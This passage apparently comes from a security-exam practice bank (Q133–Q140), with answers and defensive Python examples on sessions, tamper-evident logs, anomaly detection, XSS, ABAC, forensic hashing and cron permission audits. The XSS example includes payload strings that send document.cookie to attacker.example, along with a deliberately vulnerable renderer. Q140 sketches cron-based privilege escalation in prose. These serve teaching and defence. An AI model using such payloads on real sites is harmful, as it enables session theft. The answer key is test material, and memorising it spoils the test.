A) Cross-site scripting (XSS) involves injecting malicious scripts into a website, affecting client-side users. While XSS can be used to steal session tokens, the scenario specifically describes insecure storage of session identifiers, not malicious script execution.

B) Session hijacking is correct. Session hijacking occurs when attackers capture or guess valid session identifiers to impersonate a user. Storing session tokens in URLs is insecure because:

URLs are written to browser history, web server and proxy access logs, and bookmarks, so the token persists in places that are rarely protected as secrets.

URLs leak to other sites through the Referer header whenever the page links to, or loads a resource from, a third party (analytics, CDNs, advertisers), and users share links without realizing the token is in them.

Anyone who can read those logs or that traffic can replay the token to take over the session, and if the application accepts a session identifier from the URL an attacker can plant a known one in a link sent to the victim (session fixation).

Exploiting this weakness lets an attacker take over an active session without ever authenticating. Prevention measures include carrying the session identifier only in a cookie marked Secure, HttpOnly and SameSite, regenerating the identifier after login (and after any privilege change), setting short idle and absolute expiration times, rejecting session identifiers presented in query strings, and setting a restrictive Referrer-Policy so page URLs are not forwarded to third parties.
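The checks above, as an added example that is not part of the original page: a helper that flags session-like parameters in a URL (what a tester looks for in proxy logs), and a minimal server-side session store that regenerates the identifier at login and issues it only in a cookie carrying the Secure, HttpOnly and SameSite attributes. The parameter-name list, the sample URL and the cookie name are assumptions.

```python
"""Session tokens: spot them in URLs, and issue them the safe way (cookie, regenerated at login).

Added example; not code from the original page. The parameter-name list, the cookie name and
the sample URL are constructed for illustration.
"""
import secrets
from http.cookies import SimpleCookie
from urllib.parse import parse_qs, urlsplit

# Query-string keys that commonly carry a session identifier (constructed list; extend as needed)
SESSION_PARAM_NAMES = {"sessionid", "session_id", "sid", "phpsessid", "jsessionid", "token", "auth"}


def tokens_in_url(url: str) -> dict:
    """Return {param: value} for any session-like parameter found in the URL's query string.

    Anything returned here will end up in browser history, server and proxy logs, and the
    Referer header of every outbound link on the page.
    """
    parts = urlsplit(url)
    found = {}
    for key, values in parse_qs(parts.query, keep_blank_values=True).items():
        if key.lower() in SESSION_PARAM_NAMES:
            found[key] = values[0]
    return found


class SessionStore:
    """Minimal server-side session store keyed by an unguessable identifier."""

    def __init__(self):
        self._sessions = {}

    def create(self, data: dict) -> str:
        sid = secrets.token_urlsafe(32)  # 256 bits from the OS CSPRNG; not guessable
        self._sessions[sid] = dict(data)
        return sid

    def regenerate(self, old_sid: str) -> str:
        """Issue a fresh identifier after login so any pre-login id (fixation) is worthless."""
        data = self._sessions.pop(old_sid)
        return self.create(data)

    def get(self, sid: str):
        return self._sessions.get(sid)


def set_cookie_header(sid: str, max_age: int = 900) -> str:
    """Build the Set-Cookie value with the attributes the explanation recommends."""
    cookie = SimpleCookie()
    cookie["session"] = sid
    cookie["session"]["secure"] = True         # sent only over HTTPS
    cookie["session"]["httponly"] = True       # not readable by page scripts (limits XSS theft)
    cookie["session"]["samesite"] = "Strict"   # not attached to cross-site requests
    cookie["session"]["path"] = "/"
    cookie["session"]["max-age"] = max_age     # bounded lifetime
    return cookie["session"].OutputString()
```

`tokens_in_url` is deliberately name-based: run it over access-log URLs or a proxy export and every hit is a token that has already been written to disk somewhere.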

C)  SQL injection targets database queries via unsanitized input. While critical, it does not relate to session token management or URL storage, so it is not applicable here.

D) Man-in-the-middle (MITM) attack intercepts communications between parties. While MITM could exploit insecure session tokens during transmission, the vulnerability in this case is about storage in URLs, not the interception mechanism.

Session hijacking through identifiers exposed in URLs is a high-impact vulnerability, enabling attackers to take over user accounts, access sensitive data, and perform unauthorized transactions. Secure session management practices are essential for protecting web applications and user data.

Q134. A financial institution wants to ensure that all transactions are logged in a way that cannot be modified, even by administrators. Which security property is the organization enforcing?

A)  Redundancy
B)  Non-repudiation
C)  Immutability
D)  Elasticity

Answer: C)  Immutability

Explanation:

A) Redundancy improves system availability by duplicating systems, storage, or services. While it ensures accessibility, redundancy does not prevent modification of records or logs, so it does not address the requirement for tamper-proof transaction logs.

B)  Non-repudiation ensures that a party cannot deny having performed an action, typically by binding the action to the actor with a digital signature. It supports accountability, but it does not by itself stop the log that records the action from being altered or deleted afterwards.

C)  Immutability is correct. Immutability ensures that once data is written, it cannot be modified or deleted. For financial transactions, immutable logs:

Provide a tamper-proof audit trail for regulatory compliance.

Support forensic investigations and accountability.

Can be implemented using write-once-read-many (WORM) storage, blockchain-based ledgers, or append-only logging mechanisms.

By enforcing immutability, the organization ensures the trustworthiness of records even if administrators or attackers attempt to alter them. Best practices include hash-chaining or signing log entries so that any edit, insertion, or deletion breaks verification, forwarding logs to a separate system that administrators of the source cannot write to, anchoring the latest hash somewhere outside administrator control, and keeping regular backups.
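An append-only, hash-chained log, added here as an illustration and not code from the page: every entry's hash covers the previous entry's hash, so an in-place edit or a deletion in the middle breaks verification, and an anchored head hash catches the case where an administrator rewrites the whole tail. The record layout and the sample transactions are constructed.

```python
"""Append-only transaction log protected by a hash chain.

Added example, not code from the page. Each entry's hash covers the previous entry's hash and
the entry's own content, so editing or deleting anything except the tail breaks verification.
The record layout and the sample transactions are constructed.
"""
import hashlib
import json

GENESIS = "0" * 64  # previous-hash value for the first entry


def entry_hash(prev_hash: str, record: dict) -> str:
    """SHA-256 over the previous hash plus a canonical (sorted, compact) JSON form of the record."""
    payload = prev_hash + json.dumps(record, sort_keys=True, separators=(",", ":"))
    return hashlib.sha256(payload.encode("utf-8")).hexdigest()


class HashChainedLog:
    def __init__(self):
        self.entries = []  # each: {"record": {...}, "prev": hex, "hash": hex}

    def append(self, record: dict) -> str:
        prev = self.entries[-1]["hash"] if self.entries else GENESIS
        h = entry_hash(prev, record)
        self.entries.append({"record": dict(record), "prev": prev, "hash": h})
        return h

    def head(self) -> str:
        """Hash of the newest entry; copy it somewhere administrators cannot write (WORM, third party)."""
        return self.entries[-1]["hash"] if self.entries else GENESIS

    def verify(self, anchor: str = None) -> int:
        """Index of the first entry that fails verification, or -1 if the chain is intact.

        If an anchor (a previously recorded head hash) is supplied, the chain must also end at it;
        a mismatch is reported as index len(entries), which catches truncation and full rewrites.
        """
        prev = GENESIS
        for i, e in enumerate(self.entries):
            if e["prev"] != prev or entry_hash(prev, e["record"]) != e["hash"]:
                return i
            prev = e["hash"]
        if anchor is not None and prev != anchor:
            return len(self.entries)
        return -1


def demo() -> tuple:
    """Append three transactions, record the anchor, tamper the way an administrator might, and check."""
    log = HashChainedLog()
    # Amounts are strings: canonical JSON of floats is a classic source of spurious mismatches.
    log.append({"txn": 1, "from": "ACC-100", "to": "ACC-200", "amount": "250.00"})
    log.append({"txn": 2, "from": "ACC-200", "to": "ACC-300", "amount": "75.50"})
    log.append({"txn": 3, "from": "ACC-100", "to": "ACC-400", "amount": "1000.00"})
    anchor = log.head()
    intact = log.verify(anchor)                        # -1

    log.entries[1]["record"]["amount"] = "7550.00"     # edit a stored record in place
    edited = log.verify(anchor)                        # 1: entry 1 no longer matches its hash

    log.entries[1]["hash"] = entry_hash(log.entries[1]["prev"], log.entries[1]["record"])
    rehashed = log.verify(anchor)                      # 2: entry 2's prev no longer matches

    for i in range(2, len(log.entries)):               # rewrite every later link as well
        log.entries[i]["prev"] = log.entries[i - 1]["hash"]
        log.entries[i]["hash"] = entry_hash(log.entries[i]["prev"], log.entries[i]["record"])
    rewritten_unanchored = log.verify()                # -1: the chain alone is fooled
    rewritten_anchored = log.verify(anchor)            # 3: the head no longer matches the anchor
    return intact, edited, rehashed, rewritten_unanchored, rewritten_anchored
```

The last two results are the practical point: an administrator with write access to the log file can recompute every hash after an edit and produce a chain that verifies. Immutability therefore needs the chain plus an anchor (the head hash, written at the time to WORM storage or a party the administrator cannot influence) or a signing key the administrator does not hold.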

D)  Elasticity refers to the ability of systems to scale resources up or down on demand, which is unrelated to protecting the integrity or unalterability of logs.

Immutability is essential for high-integrity environments such as finance, healthcare, and critical infrastructure. It protects against both accidental and intentional tampering, providing auditable, reliable records for compliance and dispute resolution.

Q135. A company detects unusual login patterns where multiple accounts are being accessed from the same IP address outside of normal working hours. Which type of detection mechanism would best identify this activity?

A)  Signature-based intrusion detection system
B)  Behavior-based analytics
C)  Static firewall
D)  Packet filtering

Answer: B)  Behavior-based analytics

Explanation:

A)  Signature-based intrusion detection systems rely on known attack patterns or signatures to detect threats. They are effective for identifying known attacks but cannot detect deviations from normal user behavior, such as unusual login times, making them unsuitable for this scenario.

B)  Behavior-based analytics is correct. Behavior-based or anomaly detection systems establish baselines for normal user, device, and application activity. Deviations such as logins from unusual IP addresses, unusual times, or abnormal resource access trigger alerts. Key features include:

Baseline modeling: Understanding typical login times, geolocations, and system usage.

Anomaly detection: Identifying outliers that may indicate insider threats or compromised accounts.

Machine learning integration: Statistical or ML models help reduce false positives and improve detection accuracy.

Real-time alerts: Allowing security operations teams to respond quickly to potential threats.

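Anomaly logic of the kind described above, added as an example rather than taken from the page: it learns each user's normal login hours from a baseline period, then flags successful logins at hours never seen for that user and any source IP that attempts several distinct accounts within a ten-minute window. The log format, the users, the addresses and the cutoff date are constructed.

```python
"""Behaviour-based detection over authentication events.

Added example, not from the page. Baselines each user's login hours, then flags off-hours
logins and one source IP touching many accounts in a short window. The log format, the
sample events and the cutoff date are constructed.
"""
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample log: the first six lines establish each user's normal pattern;
# the last four show one address working through several accounts at 02:xx.
SAMPLE_LOG = """\
2024-03-04T09:02:11Z user=alice src=198.51.100.10 result=success
2024-03-04T09:15:40Z user=bob src=198.51.100.11 result=success
2024-03-05T08:55:03Z user=alice src=198.51.100.10 result=success
2024-03-05T10:01:27Z user=carol src=198.51.100.12 result=success
2024-03-06T09:07:44Z user=bob src=198.51.100.11 result=success
2024-03-06T14:20:09Z user=carol src=198.51.100.12 result=success
2024-03-07T02:03:15Z user=alice src=203.0.113.7 result=success
2024-03-07T02:04:02Z user=bob src=203.0.113.7 result=failure
2024-03-07T02:04:49Z user=carol src=203.0.113.7 result=success
2024-03-07T02:06:30Z user=dave src=203.0.113.7 result=failure
"""


def parse(log_text: str) -> list:
    """Turn 'timestamp key=value ...' lines into dicts, sorted by time."""
    events = []
    for line in log_text.splitlines():
        if not line.strip():
            continue
        ts, *fields = line.split()
        kv = dict(f.split("=", 1) for f in fields)
        events.append({"ts": datetime.strptime(ts, "%Y-%m-%dT%H:%M:%SZ"), **kv})
    return sorted(events, key=lambda e: e["ts"])


def build_baseline(events: list, before: datetime) -> dict:
    """Hours of day at which each user successfully logged in before the cutoff."""
    hours = defaultdict(set)
    for e in events:
        if e["ts"] < before and e["result"] == "success":
            hours[e["user"]].add(e["ts"].hour)
    return dict(hours)


def off_hours_logins(events: list, baseline: dict, since: datetime) -> list:
    """Successful logins at an hour the user has never been seen active at."""
    alerts = []
    for e in events:
        if e["ts"] >= since and e["result"] == "success":
            if e["ts"].hour not in baseline.get(e["user"], set()):
                alerts.append((e["ts"].isoformat(), e["user"], e["src"]))
    return alerts


def multi_account_sources(events: list, window: timedelta, min_accounts: int) -> list:
    """Source IPs that try (success or failure) at least min_accounts distinct users within window."""
    by_src = defaultdict(list)
    for e in events:  # events are already time-ordered
        by_src[e["src"]].append(e)
    alerts = []
    for src, evs in by_src.items():
        for i, start in enumerate(evs):
            users = {x["user"] for x in evs[i:] if x["ts"] - start["ts"] <= window}
            if len(users) >= min_accounts:
                alerts.append((src, sorted(users)))
                break
    return alerts


def run(log_text: str = SAMPLE_LOG) -> dict:
    events = parse(log_text)
    cutoff = datetime(2024, 3, 7)  # baseline period ends here; detection runs from here on
    baseline = build_baseline(events, cutoff)
    return {
        "off_hours": off_hours_logins(events, baseline, cutoff),
        "multi_account": multi_account_sources(events, timedelta(minutes=10), 3),
    }
```

Neither rule has a signature to match: the first compares each user with their own history, the second looks at the shape of activity from one address. Failures count toward the second rule on purpose, because an attacker trying known credentials produces mostly failures.
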
C)  Static firewalls enforce predefined rules for network traffic but do not monitor user behavior or detect anomalies. While important for perimeter defense, firewalls cannot identify unusual login patterns.

D)  Packet filtering inspects network traffic headers to allow or block packets based on rules. It does not analyze user behavior, login patterns, or temporal anomalies, so it cannot detect this type of suspicious activity.

Behavior-based analytics is particularly valuable in detecting insider threats, compromised credentials, and early stages of attacks. Organizations in finance, healthcare, and critical infrastructure rely on behavior-based monitoring to supplement traditional defenses and proactively identify threats.

Q136. During a security audit, an organization finds that several users have been using the same administrative credentials across multiple systems. Which security principle is being violated, and what risks does this pose?

A)  Accountability
B)  Least privilege
C)  Separation of duties
D)  Role rotation

Answer: A)  Accountability

Explanation:

A)  Accountability is correct. Accountability ensures that all actions performed in a system can be traced to a specific individual. By sharing administrative credentials, users undermine this principle because it becomes impossible to determine who executed a particular action. This has several risks:

Audit failures: Regulatory standards such as PCI DSS, SOX, and HIPAA require that privileged actions be traceable to an individual. Shared credentials violate these requirements.

Malicious activity masking: If a breach occurs or data is manipulated, investigation becomes difficult because any of several people could have been behind the account.

Internal threat escalation: Insider threats are harder to detect when several people use the same credentials, increasing the risk of sabotage or unauthorized access.

Lack of forensic reliability: Investigations depend on tying an action to one identity. A shared account produces log evidence that names the account but cannot name the person, which weakens its value in a disciplinary or legal proceeding.

B)  Least privilege restricts user access to the minimum necessary for their job. While shared administrative credentials often also violate least privilege, the primary principle being violated is accountability, not privilege limitation.

C)  Separation of duties divides responsibilities to prevent fraud or errors. While shared credentials could impact separation of duties, the scenario focuses on traceability, which is directly related to accountability.

D)  Role rotation involves periodically changing duties to reduce insider threat risks. Credential sharing does not directly relate to rotating roles.

To mitigate accountability risks, organizations should enforce unique credentials for every user, implement multi-factor authentication, and maintain detailed audit logs. Privileged access management (PAM) tools can help ensure that administrative accounts are used securely and that actions are attributable to a specific user.

Q137. A web application is found to accept unvalidated input in search fields, which allows attackers to inject scripts that execute in other users’ browsers. Which type of vulnerability is this, and what are the implications?

A)  SQL injection
B)  Cross-site scripting
C)  Command injection
D)  Path traversal

Answer: B)  Cross-site scripting

Explanation:

A) SQL injection occurs when attackers manipulate SQL queries to access or modify databases. While highly dangerous, SQL injection does not target the client-side browser directly, so it is not relevant to this scenario.

B) Cross-site scripting (XSS) is correct. XSS vulnerabilities arise when user-supplied input is not properly sanitized and is rendered on web pages viewed by other users. Attackers can inject malicious scripts to:

Steal session cookies or tokens, enabling account hijacking.

Redirect users to phishing sites.

Execute malicious actions in the context of a logged-in user, potentially causing data leakage.

Deliver malware to users’ browsers.

XSS can be categorized into three main types:

Stored XSS: Malicious input is saved on the server and served to all users accessing the affected page.

Reflected XSS: Malicious input is reflected immediately in the server response, typically through URLs or form inputs.

DOM-based XSS: Vulnerabilities exist in client-side code manipulation of the Document Object Model.

Mitigation involves proper input validation, output encoding, use of security headers like Content Security Policy (CSP), and avoiding unsafe HTML rendering of user input.
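The vulnerable rendering beside the hardened one, as an added example that is not the page's code: the search term goes straight into the HTML in one function and is encoded for each context it lands in (element text, URL query value) in the other. The payloads, the page markup and the CSP value are constructed. The naive blocklist is included to show why stripping `<script>` is not a fix.

```python
"""Reflected XSS in a search page: the vulnerable rendering beside the hardened one.

Added example, not the page's code. The page markup, the payloads and the CSP value are
constructed for illustration.
"""
import html
from urllib.parse import quote

# Two constructed payloads: the obvious one, and one that survives a '<script>' blocklist.
SCRIPT_PAYLOAD = '<script>fetch("https://attacker.example/?c=" + document.cookie)</script>'
IMG_PAYLOAD = '<img src=x onerror="fetch(\'https://attacker.example/?c=\' + document.cookie)">'


def render_vulnerable(query: str) -> str:
    """Echoes the search term straight into the HTML; the browser runs whatever was typed."""
    return f'<h1>Results for {query}</h1><a href="/search?q={query}">permalink</a>'


def naive_blocklist(query: str) -> str:
    """Common mistake: remove the string '<script>' and call the input sanitised."""
    return query.replace("<script>", "").replace("</script>", "")


def render_safe(query: str) -> str:
    """Encodes the term for each context it lands in: HTML text and a URL query value."""
    return (
        f"<h1>Results for {html.escape(query, quote=True)}</h1>"
        f'<a href="/search?q={quote(query, safe="")}">permalink</a>'
    )


# Defence in depth: if an encoding bug slips through, inline script still does not run under this policy.
CSP_HEADER = "Content-Security-Policy: default-src 'self'; script-src 'self'; object-src 'none'; base-uri 'none'"


def has_injected_tag(page: str) -> bool:
    """Test helper: did a raw <script> or <img> tag from user input survive into the page?"""
    lowered = page.lower()
    return "<script" in lowered or "<img" in lowered
```

Encoding is per context: `html.escape` is right for text between tags, `quote` for a value inside a URL, and a JavaScript string or an event-handler attribute would each need their own encoder. A blocklist fails on case (`<SCRIPT>`), on tags it did not think of (`<img onerror>`), and on encodings, which is why the fix is output encoding rather than input filtering.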

C)  Command injection allows attackers to execute OS commands on the server. While dangerous, this scenario describes attacks targeting client-side browsers, not server-level command execution.

D) Path traversal exploits insecure file path handling to access files outside intended directories. This vulnerability does not involve executing scripts in other users’ browsers.

XSS vulnerabilities are critical because they exploit the trust a user's browser places in the application. Organizations must follow secure coding practices, apply context-aware output encoding, validate input, and test regularly (including penetration testing) to prevent XSS attacks.

Q138. A company wants to restrict access to cloud resources based on device compliance, location, and time of access. Which access control model supports this level of granularity and dynamic enforcement?

A)  Discretionary access control
B)  Role-based access control
C)  Attribute-based access control
D)  Mandatory access control

Answer: C)  Attribute-based access control

Explanation:

A) Discretionary access control (DAC) lets the owner of a resource grant access at their discretion. While flexible, DAC has no way to express context-aware conditions such as device compliance or location, so it does not meet this requirement.

B) Role-based access control (RBAC) grants permissions based on user roles. While RBAC simplifies management and ensures that users have only role-appropriate access, it cannot dynamically evaluate context such as device health, geolocation, or time of access.

C)  Attribute-based access control (ABAC) is correct. ABAC enforces access policies based on multiple attributes associated with users, devices, and environmental conditions. In a cloud environment, ABAC enables:

Conditional access: Users can access resources only if certain conditions (device compliance, location, time) are met.

Dynamic policy enforcement: Access is evaluated in real time, reducing the risk of unauthorized access.

Fine-grained control: Policies can consider combinations of attributes, supporting complex security requirements.

Integration with zero-trust frameworks: ABAC aligns with zero-trust principles by continuously evaluating trust before granting access.

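A policy decision point of the kind ABAC describes, added as an illustration and not code from the page: deny rules over device posture, location, time of day and MFA are evaluated first, then permit rules over department and resource. The attribute names, the allowed-country list, the business-hours window and the scenarios are constructed.

```python
"""Attribute-based access control: permit or deny from user, device and environment attributes.

Added example, not the page's code. The attribute names, the rules, the allowed-country list
and the business-hours window are constructed; a real deployment sources them from the
identity provider, the device-management service and the request context.
"""
from dataclasses import dataclass
from datetime import time


@dataclass(frozen=True)
class Subject:
    user: str
    department: str
    mfa: bool            # did this session complete MFA


@dataclass(frozen=True)
class Device:
    managed: bool        # enrolled in device management
    compliant: bool      # passes posture checks (encryption, EDR, patch level)


@dataclass(frozen=True)
class Environment:
    country: str
    local_time: time


ALLOWED_COUNTRIES = {"US", "CA", "GB"}
BUSINESS_HOURS = (time(7, 0), time(19, 0))

# Deny rules: any match refuses the request (deny-overrides combining).
DENY_RULES = [
    ("device-not-managed-or-compliant",
     lambda c: not (c["device"].managed and c["device"].compliant)),
    ("location-not-allowed",
     lambda c: c["env"].country not in ALLOWED_COUNTRIES),
    ("write-outside-business-hours",
     lambda c: c["action"] == "write"
     and not BUSINESS_HOURS[0] <= c["env"].local_time <= BUSINESS_HOURS[1]),
    ("sensitive-resource-without-mfa",
     lambda c: c["resource"].startswith("finance/") and not c["subject"].mfa),
]

# Permit rules: at least one must match once no deny rule has fired.
PERMIT_RULES = [
    ("finance-department-finance-data",
     lambda c: c["resource"].startswith("finance/") and c["subject"].department == "finance"),
    ("anyone-read-public",
     lambda c: c["resource"].startswith("public/") and c["action"] == "read"),
]


def decide(subject: Subject, device: Device, env: Environment, resource: str, action: str) -> tuple:
    """Return ("permit" | "deny", [names of the rules that produced the decision])."""
    ctx = {"subject": subject, "device": device, "env": env, "resource": resource, "action": action}
    denies = [name for name, cond in DENY_RULES if cond(ctx)]
    if denies:
        return "deny", denies
    permits = [name for name, cond in PERMIT_RULES if cond(ctx)]
    return ("permit", permits) if permits else ("deny", ["no-permit-rule-matched"])


def scenarios() -> list:
    """Same finance user and role, different context: a role check alone would permit every time."""
    alice = Subject("alice", "finance", mfa=True)
    good = Device(managed=True, compliant=True)
    stale = Device(managed=True, compliant=False)
    return [
        decide(alice, good, Environment("US", time(10, 0)), "finance/ledger", "write"),
        decide(alice, good, Environment("US", time(22, 30)), "finance/ledger", "write"),
        decide(alice, stale, Environment("US", time(10, 0)), "finance/ledger", "read"),
        decide(alice, good, Environment("BR", time(10, 0)), "finance/ledger", "read"),
        decide(Subject("bob", "engineering", mfa=True), good,
               Environment("US", time(10, 0)), "finance/ledger", "read"),
        decide(Subject("bob", "engineering", mfa=False), good,
               Environment("GB", time(10, 0)), "public/handbook", "read"),
    ]
```

Returning the rule names with the decision matters operationally: it is what the access log and the user-facing denial message need, and it is how a policy author finds out which condition fired when the result is unexpected.
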
D) Mandatory access control (MAC) enforces strict, label-based policies determined by a central authority. While highly secure, MAC is static and does not evaluate dynamic contextual attributes like device compliance or time-based conditions.

ABAC is widely used in modern cloud and enterprise environments to balance flexibility and security. By implementing ABAC, organizations can reduce unauthorized access risks, enforce compliance, and maintain granular control over sensitive resources.

Q139. During a forensic investigation, an analyst wants to ensure that collected evidence has not been altered. Which method provides the highest assurance of integrity?

A)  Disk partitioning
B)  Hashing
C)  Defragmentation
D)  Sanitization

Answer: B)  Hashing

Explanation:

A)  Disk partitioning involves modifying the structure of storage media to create partitions. This alters the disk and does not provide integrity verification.

B)  Hashing is correct. A cryptographic hash function produces a fixed-length digest that is, for practical purposes, unique to its input: any change to the data, even one bit, yields a different digest, so the analyst can show the evidence is identical to what was collected. Important aspects include:

Cryptographic hash functions: SHA-256 or SHA-3 produce fixed-length outputs that change if even a single bit is altered. MD5 and SHA-1 are no longer collision resistant; if legacy tooling requires them, record a SHA-256 digest alongside.

Chain of custody: Hash values recorded at acquisition and re-verified at each hand-off support legal admissibility by showing the evidence has not been tampered with.

Verification: Comparing the hash of the original with the hash of the forensic copy confirms the copy is exact; re-hashing the original afterwards confirms acquisition did not disturb it.

Best practices: Acquire through a write blocker, hash both originals and copies, and document the algorithm, the values, the time, and who performed the verification in the forensic log.

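The verification step, as an added example that is not the page's code: hash the source, copy it, hash the copy, re-hash the source, and write the result into a custody record. It builds a constructed evidence file in a temporary directory so it runs offline; on a real acquisition the source is read through a write blocker and the copy is the forensic image.

```python
"""Verify a forensic copy by hashing: hash the original, hash the copy, compare, record it.

Added example, not the page's code. Builds a small constructed 'evidence' file in a temporary
directory so it runs offline; real acquisitions hash the source device through a write blocker.
"""
import hashlib
import os
import shutil
import tempfile
from datetime import datetime, timezone

CHUNK = 1 << 20  # hash in 1 MiB chunks so a disk image never has to fit in memory


def file_digest(path: str, algorithm: str = "sha256") -> str:
    h = hashlib.new(algorithm)
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(CHUNK), b""):
            h.update(chunk)
    return h.hexdigest()


def acquire_and_verify(source: str, dest: str, algorithm: str = "sha256") -> dict:
    """Copy the evidence, verify the copy against the source hash, and return a custody record."""
    before = file_digest(source, algorithm)
    shutil.copyfile(source, dest)
    after = file_digest(dest, algorithm)
    source_again = file_digest(source, algorithm)  # confirm the source itself was not disturbed
    return {
        "source": source,
        "copy": dest,
        "algorithm": algorithm,
        "source_hash": before,
        "copy_hash": after,
        "verified": before == after == source_again,
        "timestamp": datetime.now(timezone.utc).isoformat(),
    }


def demo() -> tuple:
    """Acquire a constructed file, verify it, then flip one bit in the copy and re-check."""
    work = tempfile.mkdtemp()
    try:
        src = os.path.join(work, "evidence.bin")
        dst = os.path.join(work, "evidence.bin.copy")
        with open(src, "wb") as f:
            f.write(b"constructed evidence blob " * 1000)
        record = acquire_and_verify(src, dst)
        with open(dst, "r+b") as f:  # simulate a single-bit change in the copy
            f.seek(10)
            original_byte = f.read(1)
            f.seek(10)
            f.write(bytes([original_byte[0] ^ 0x01]))
        still_matches = file_digest(dst) == record["copy_hash"]
        return record["verified"], still_matches
    finally:
        shutil.rmtree(work)
```

The record is the artefact that travels with the evidence: whoever receives the copy later re-runs `file_digest` and compares against `copy_hash`, which is what makes each hand-off in the chain of custody checkable rather than taken on trust.
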
C) Defragmentation reorganizes files on a disk, modifying data layout. This would invalidate forensic integrity, so it is inappropriate for evidence verification.

D)  Sanitization destroys or irreversibly modifies data to prevent recovery. This contradicts forensic goals of preserving evidence and is not suitable for integrity verification.

Hashing is essential in digital forensics, ensuring trust in evidence and supporting prosecutorial requirements in legal proceedings. It is a cornerstone of forensic methodology for verifying integrity.

Q140. A penetration tester finds a Linux server where a root-owned cron job executes a script that is writable by all users. Which type of attack could be performed next?


A)  Privilege escalation
B)  Lateral movement
C)  Credential harvesting
D)  Pivoting

Answer: A)  Privilege escalation

Explanation:

A)  Privilege escalation is correct. A script that root's cron runs but that any user can write to is a critical misconfiguration: the attacker does not need to exploit a bug, only to edit a file. Steps for exploitation include:

Modifying the script to execute commands with root privileges.

Waiting for cron to execute the script, thereby gaining elevated privileges.

Using root access to secure persistence, extract data, or launch additional attacks.

This scenario demonstrates a classic misconfiguration vulnerability caused by improper file permissions. Privilege escalation allows attackers to gain administrative control of the system, which can compromise the entire network if not mitigated.

B)  Lateral movement occurs after gaining access to one system to exploit others in the network. While privilege escalation can facilitate lateral movement, the immediate risk is gaining elevated privileges locally.

C)  Credential harvesting targets stored passwords or tokens. While root access could enable credential harvesting later, the primary vulnerability here is misconfigured cron permissions.

D)  Pivoting involves using a compromised host to launch attacks on other systems. Pivoting is a subsequent step and depends on first achieving privilege escalation.

Mitigation includes proper file permissions (remove the group and other write bits from anything cron runs as root, and make sure the script and the directory containing it are owned by root), least privilege enforcement, regular configuration audits, and monitoring of scheduled tasks. Security policies should prevent world-writable scripts from being executed by elevated accounts to avoid privilege escalation vulnerabilities.
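An audit of the kind the mitigation paragraph calls for, added here as an example and not code from the page: it parses lines in /etc/crontab format (minute hour day month weekday user command), locates the files each command references, and reports any that group or other can write to, any root job whose file is not owned by root, and any file whose parent directory is world-writable without the sticky bit (the file could be replaced rather than edited). The demo builds a constructed crontab and two scripts in a temporary directory; on a host, feed `audit_crontab` the contents of /etc/crontab or the files under /etc/cron.d (root's own crontab needs root to read). The `root_uid` parameter exists so the demo can treat the current user as root; on a host leave it at 0.

```python
"""Audit cron jobs for scripts that low-privileged users can modify.

Added example, not the page's code. Parses /etc/crontab-style lines (minute hour dom month dow
user command) and checks the files each command references. The demo builds a constructed
crontab in a temporary directory; on a host, feed it the contents of /etc/crontab or /etc/cron.d/*.
"""
import os
import shlex
import shutil
import stat
import tempfile


def parse_system_crontab(text: str) -> list:
    """Return (user, command) for each job line; skips comments, blanks and VAR=value lines."""
    jobs = []
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#") or "=" in line.split()[0]:
            continue
        # @reboot/@daily lines have 3 fields; five-field schedules have 7
        parts = line.split(None, 2) if line.startswith("@") else line.split(None, 6)
        if len(parts) == (3 if line.startswith("@") else 7):
            jobs.append((parts[-2], parts[-1]))
    return jobs


def referenced_files(command: str) -> list:
    """Absolute paths in the command that exist on disk (interpreter and script alike)."""
    try:
        tokens = shlex.split(command)
    except ValueError:  # unbalanced quotes: fall back to a plain split
        tokens = command.split()
    return [t for t in tokens if t.startswith("/") and os.path.isfile(t)]


def findings_for(path: str, runs_as: str, root_uid: int = 0) -> list:
    """Permission problems that let a non-root user change what the job executes."""
    st = os.stat(path)
    problems = []
    if st.st_mode & stat.S_IWOTH:
        problems.append("world-writable")
    elif st.st_mode & stat.S_IWGRP:
        problems.append("group-writable")
    if runs_as == "root" and st.st_uid != root_uid:
        problems.append("not-owned-by-root")
    parent = os.stat(os.path.dirname(path))
    if parent.st_mode & stat.S_IWOTH and not parent.st_mode & stat.S_ISVTX:
        problems.append("parent-dir-world-writable")  # the file can be replaced outright
    return problems


def audit_crontab(text: str, root_uid: int = 0) -> list:
    """Findings for every file referenced by a job in the given crontab text."""
    results = []
    for user, command in parse_system_crontab(text):
        for path in referenced_files(command):
            issues = findings_for(path, user, root_uid)
            if issues:
                results.append({"user": user, "file": path, "issues": issues})
    return results


def demo() -> list:
    """Constructed host: one correctly permissioned job and one root job running a 777 script."""
    work = tempfile.mkdtemp()
    try:
        safe = os.path.join(work, "rotate.sh")
        weak = os.path.join(work, "backup.sh")
        for p in (safe, weak):
            with open(p, "w") as f:
                f.write("#!/bin/sh\necho job\n")
        os.chmod(safe, 0o755)
        os.chmod(weak, 0o777)  # the misconfiguration from the question
        crontab = (
            "SHELL=/bin/sh\n"
            "# m h dom mon dow user command\n"
            f"0 3 * * * root {safe}\n"
            f"*/5 * * * * root {weak} --full\n"
        )
        # The current user stands in for root here because this process created the files.
        return [{"file": os.path.basename(r["file"]), "issues": r["issues"]}
                for r in audit_crontab(crontab, root_uid=os.getuid())]
    finally:
        shutil.rmtree(work)
```

Checking the interpreter and the parent directory as well as the script itself is deliberate: a job written as `/usr/bin/python3 /opt/job.py` is just as exposed if either path can be replaced by a user other than root.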
